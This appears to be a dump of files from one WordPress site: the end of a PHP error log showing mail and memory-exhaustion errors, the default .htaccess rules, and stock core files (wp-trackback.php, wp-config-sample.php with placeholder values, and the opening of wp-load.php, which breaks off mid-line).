/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1668): PHPMailer\PHPMailer\PHPMailer->postSend() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/pluggable.php(628): PHPMailer\PHPMailer\PHPMailer->send() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/includes/class-wp-automatic-updater.php(1149): wp_mail() #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/includes/class-wp-automatic-updater.php(804): WP_Automatic_Updater->send_email() #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/includes/class-wp-automatic-updater.php(771): WP_Automatic_Updater->after_core_update() #7 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/update.php(890): WP_Automatic_Updater->run() #8 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): wp_maybe_auto_update() #9 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #10 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #11 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/update.php(337): do_action() #12 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): wp_version_check() #13 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #14 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(570): WP_Hook->do_action() #15 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(191): do_action_ref_array() #16 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php on line 893 [18-Jul-2026 07:40:58 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1015 [18-Jul-2026 11:37:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1017 [18-Jul-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 537 [18-Jul-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [18-Jul-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 5 [18-Jul-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [19-Jul-2026 21:40:15 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 510 [19-Jul-2026 21:40:15 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [19-Jul-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 5 [19-Jul-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [20-Jul-2026 21:40:16 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 510 [20-Jul-2026 21:40:16 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [20-Jul-2026 21:40:24 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 5 [20-Jul-2026 21:40:24 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [21-Jul-2026 21:40:58 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 510 [21-Jul-2026 21:40:58 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [21-Jul-2026 21:41:05 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 5 [21-Jul-2026 21:41:05 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [22-Jul-2026 21:40:59 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 537 [22-Jul-2026 21:40:59 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [22-Jul-2026 21:41:06 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 5 [22-Jul-2026 21:41:06 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [23-Jul-2026 12:39:16 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 839 [23-Jul-2026 12:39:16 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 839 [23-Jul-2026 12:39:16 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 839 [23-Jul-2026 12:39:50 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 855 [23-Jul-2026 12:39:50 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 855 [23-Jul-2026 12:39:50 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 855 [23-Jul-2026 21:41:00 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 510 [23-Jul-2026 21:41:00 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [23-Jul-2026 21:41:06 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 5 [23-Jul-2026 21:41:06 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [24-Jul-2026 04:31:43 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1015 [24-Jul-2026 21:40:49 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 537 [24-Jul-2026 21:40:49 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [24-Jul-2026 21:40:57 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 5 [24-Jul-2026 21:40:57 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [25-Jul-2026 21:40:48 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 537 [25-Jul-2026 21:40:48 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [25-Jul-2026 21:40:54 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 5 [25-Jul-2026 21:40:54 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [26-Jul-2026 21:40:49 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 510 [26-Jul-2026 21:40:49 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [26-Jul-2026 21:40:55 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 5 [26-Jul-2026 21:40:55 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [26-Jul-2026 23:43:09 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1087 [26-Jul-2026 23:54:02 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1087 [27-Jul-2026 01:52:55 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1087 [27-Jul-2026 01:57:12 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 870 [27-Jul-2026 01:58:24 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 870 [27-Jul-2026 02:24:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1087 [27-Jul-2026 02:57:26 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 870 [27-Jul-2026 03:57:35 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 855 [27-Jul-2026 04:24:55 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1022 [27-Jul-2026 04:41:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1022 [27-Jul-2026 04:59:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 870 [27-Jul-2026 05:53:38 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1022 [27-Jul-2026 06:06:55 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1022 [27-Jul-2026 07:33:02 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1087 [27-Jul-2026 07:33:06 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1017 [27-Jul-2026 07:43:03 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1087 [27-Jul-2026 08:57:31 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 870 [27-Jul-2026 09:57:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 870 [27-Jul-2026 10:05:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 855 [27-Jul-2026 19:15:31 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1087 [27-Jul-2026 19:26:06 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Advanced_Data_Table.php on line 1087 # BEGIN WordPress # The directives (lines) between "BEGIN WordPress" and "END WordPress" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase /wp/ RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /wp/index.php [L] </IfModule> # END WordPress<?php /** * Handle Trackbacks and Pingbacks Sent to WordPress * * @since 0.71 * * @package WordPress * @subpackage Trackbacks */ if ( empty( $wp ) ) { require_once __DIR__ . '/wp-load.php'; wp( array( 'tb' => '1' ) ); } // Always run as an unauthenticated user. wp_set_current_user( 0 ); /** * Response to a trackback. * * Responds with an error or success XML message. * * @since 0.71 * * @param int|bool $error Whether there was an error. * Default '0'. Accepts '0' or '1', true or false. * @param string $error_message Error message if an error occurred. Default empty string. */ function trackback_response( $error = 0, $error_message = '' ) { header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ) ); if ( $error ) { echo '<?xml version="1.0" encoding="utf-8"?' . ">\n"; echo "<response>\n"; echo "<error>1</error>\n"; echo "<message>$error_message</message>\n"; echo '</response>'; die(); } else { echo '<?xml version="1.0" encoding="utf-8"?' . ">\n"; echo "<response>\n"; echo "<error>0</error>\n"; echo '</response>'; } } if ( ! isset( $_GET['tb_id'] ) || ! $_GET['tb_id'] ) { $post_id = explode( '/', $_SERVER['REQUEST_URI'] ); $post_id = (int) $post_id[ count( $post_id ) - 1 ]; } $trackback_url = isset( $_POST['url'] ) ? sanitize_url( $_POST['url'] ) : ''; $charset = isset( $_POST['charset'] ) ? sanitize_text_field( $_POST['charset'] ) : ''; // These three are stripslashed here so they can be properly escaped after mb_convert_encoding(). $title = isset( $_POST['title'] ) ? sanitize_text_field( wp_unslash( $_POST['title'] ) ) : ''; $excerpt = isset( $_POST['excerpt'] ) ? sanitize_textarea_field( wp_unslash( $_POST['excerpt'] ) ) : ''; $blog_name = isset( $_POST['blog_name'] ) ? sanitize_text_field( wp_unslash( $_POST['blog_name'] ) ) : ''; if ( $charset ) { $charset = str_replace( array( ',', ' ' ), '', strtoupper( trim( $charset ) ) ); // Validate the specified "sender" charset is available on the receiving site. if ( function_exists( 'mb_list_encodings' ) && ! in_array( $charset, mb_list_encodings(), true ) ) { $charset = ''; } } if ( ! $charset ) { $charset = 'ASCII, UTF-8, ISO-8859-1, JIS, EUC-JP, SJIS'; } // No valid uses for UTF-7. if ( str_contains( $charset, 'UTF-7' ) ) { die; } // For international trackbacks. if ( function_exists( 'mb_convert_encoding' ) ) { $title = mb_convert_encoding( $title, get_option( 'blog_charset' ), $charset ); $excerpt = mb_convert_encoding( $excerpt, get_option( 'blog_charset' ), $charset ); $blog_name = mb_convert_encoding( $blog_name, get_option( 'blog_charset' ), $charset ); } // Escape values to use in the trackback. $title = wp_slash( $title ); $excerpt = wp_slash( $excerpt ); $blog_name = wp_slash( $blog_name ); if ( is_single() || is_page() ) { $post_id = $posts[0]->ID; } if ( ! isset( $post_id ) || ! (int) $post_id ) { trackback_response( 1, __( 'I really need an ID for this to work.' ) ); } if ( empty( $title ) && empty( $trackback_url ) && empty( $blog_name ) ) { // If it doesn't look like a trackback at all. wp_redirect( get_permalink( $post_id ) ); exit; } if ( ! empty( $trackback_url ) && ! empty( $title ) ) { /** * Fires before the trackback is added to a post. * * @since 4.7.0 * * @param int $post_id Post ID related to the trackback. * @param string $trackback_url Trackback URL. * @param string $charset Character set. * @param string $title Trackback title. * @param string $excerpt Trackback excerpt. * @param string $blog_name Site name. */ do_action( 'pre_trackback_post', $post_id, $trackback_url, $charset, $title, $excerpt, $blog_name ); header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ) ); if ( ! pings_open( $post_id ) ) { trackback_response( 1, __( 'Sorry, trackbacks are closed for this item.' ) ); } $title = wp_html_excerpt( $title, 250, '…' ); $excerpt = wp_html_excerpt( $excerpt, 252, '…' ); $comment_post_id = (int) $post_id; $comment_author = $blog_name; $comment_author_email = ''; $comment_author_url = $trackback_url; $comment_content = "<strong>$title</strong>\n\n$excerpt"; $comment_type = 'trackback'; $dupe = $wpdb->get_results( $wpdb->prepare( "SELECT * FROM $wpdb->comments WHERE comment_post_ID = %d AND comment_author_url = %s", $comment_post_id, $comment_author_url ) ); if ( $dupe ) { trackback_response( 1, __( 'There is already a ping from that URL for this post.' ) ); } $commentdata = array( 'comment_post_ID' => $comment_post_id, ); $commentdata += compact( 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_content', 'comment_type' ); $result = wp_new_comment( $commentdata ); if ( is_wp_error( $result ) ) { trackback_response( 1, $result->get_error_message() ); } $trackback_id = $wpdb->insert_id; /** * Fires after a trackback is added to a post. * * @since 1.2.0 * * @param int $trackback_id Trackback ID. */ do_action( 'trackback_post', $trackback_id ); trackback_response( 0 ); } <?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'database_name_here' ); /** Database username */ define( 'DB_USER', 'username_here' ); /** Database password */ define( 'DB_PASSWORD', 'password_here' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'put your unique phrase here' ); define( 'SECURE_AUTH_KEY', 'put your unique phrase here' ); define( 'LOGGED_IN_KEY', 'put your unique phrase here' ); define( 'NONCE_KEY', 'put your unique phrase here' ); define( 'AUTH_SALT', 'put your unique phrase here' ); define( 'SECURE_AUTH_SALT', 'put your unique phrase here' ); define( 'LOGGED_IN_SALT', 'put your unique phrase here' ); define( 'NONCE_SALT', 'put your unique phrase here' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php /** * Bootstrap file for setting the ABSPATH constant * and loading the wp-config.php file. The wp-config.php * file will then load the wp-settings.php file, which * will then set up the WordPress environment. * * If the wp-config.php file is not found then an error * will be displayed asking the visitor to set up the * wp-config.php file. * * Will also search for wp-config.php in WordPress' parent * directory to allow the WordPress directory to remain * untouched. * * @package WordPress */ /** Define ABSPATH as this file's directory */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /* * The error_reporting() function can be disabled in php.ini. On systems where that is the case, * it's best to add a dummy function to the wp-config.php file, but as this call to the function * is run prior to wp-config.php loading, it is wrapped in a function_exists() check. */ if ( function_exists( 'error_reporting' ) ) { /* * Initialize error reporting to a known set of levels. * * This will be adapted in wp_debug_mode() located in wp-includes/load.php based on WP_DEBUG. * @see https://www.php.net/manual/en/errorfunc.constants.php List of known error levels. */ error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR ); } /* * If wp-config.php exists in the WordPress root, or if it exists in the root and wp-settings.php * doesn't, load wp-config.php. The secondary check for wp-settings.php has the added benefit * of avoiding cases where the current directory is a nested installation, e.g. / is WordPress(a) * and /blog/ is WordPress(b). * * If neither set of conditions is true, initiate loading the setup process. */ if ( file_exists( ABSPATH . 'wp-config.php' ) ) { /** The config file resides in ABSPATH */ require_once ABSPATH . 'wp-config.php'; } elseif ( @file_exists( dirname( ABSPATH ) . '/wp-config.php' ) && ! @file_exists( dirname( ABSPATH ) . '/wp-settings.php' ) ) { /** The config file resides one level above ABSPATH but is not part of another installation */ require_once dirname( ABSPATH ) . 